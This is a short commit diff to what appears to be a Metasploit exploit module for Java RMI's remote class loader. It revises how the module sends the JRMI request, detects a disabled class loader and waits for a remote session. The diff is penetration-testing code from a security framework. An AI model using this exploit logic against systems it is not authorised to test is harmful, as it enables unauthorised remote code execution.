Smarter RMI class loader logic

unstable
HD Moore 2012-04-27 01:02:18 -05:00
parent 4c2e1c2859
commit ec831a1658
1 changed files with 19 additions and 3 deletions

View File

@ -106,10 +106,26 @@ class Metasploit3 < Msf::Exploit::Remote
# write out minimal header and packet
print_status("Connected and sending request for #{new_url}")
#sock.put("JRMI" + [2].pack("n") + "K" + [0].pack("n") + [0].pack("N") + packet);
sock.put("JRMI" + [2,0x4b,0,0].pack("nCnN") + packet);
sock.put("JRMI" + [2,0x4b,0,0].pack("nCnN") + packet)
# wait for the request to be handled
while not session_created?
buf = ""
1.upto(6) do
res = sock.get_once(-1, 5) rescue nil
break if not res
break if session_created?
buf << res
end
if buf =~ /RMI class loader disabled/
print_error("Not exploitable: the RMI class loader is disabled")
return
end
print_good("Target #{rhost}:#{rport} may be exploitable...")
# Wait for the request to be handled
1.upto(80) do
break if session_created?
select(nil, nil, nil, 0.25)
handler()
end